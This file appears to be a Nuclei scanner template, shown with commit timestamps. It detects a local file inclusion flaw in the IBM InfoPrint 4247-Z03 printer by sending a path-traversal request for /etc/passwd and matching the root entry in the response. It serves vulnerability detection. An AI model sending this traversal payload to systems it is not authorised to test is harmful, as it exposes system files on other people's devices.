2020-09-15 19:25:55 +00:00
|
|
|
id: ibm-infoprint-lfi
|
2020-07-07 12:10:48 +00:00
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Local File Inclusion
|
2021-06-09 12:20:56 +00:00
|
|
|
author: harshbothra_
|
2022-08-29 20:21:30 +00:00
|
|
|
severity: high
|
2022-07-26 13:45:11 +00:00
|
|
|
description: IBM InfoPrint 4247-Z03 Impact Matrix Printer is subject to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/47835
|
2022-07-26 13:45:11 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: matrix,printer,edb,ibm,lfi
|
2020-07-07 12:10:48 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-17 08:13:19 +00:00
|
|
|
- '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
|
2020-07-07 12:10:48 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2020-09-17 08:15:41 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2020-09-17 08:15:41 +00:00
|
|
|
part: body
|
2022-07-26 13:45:11 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/07/22
|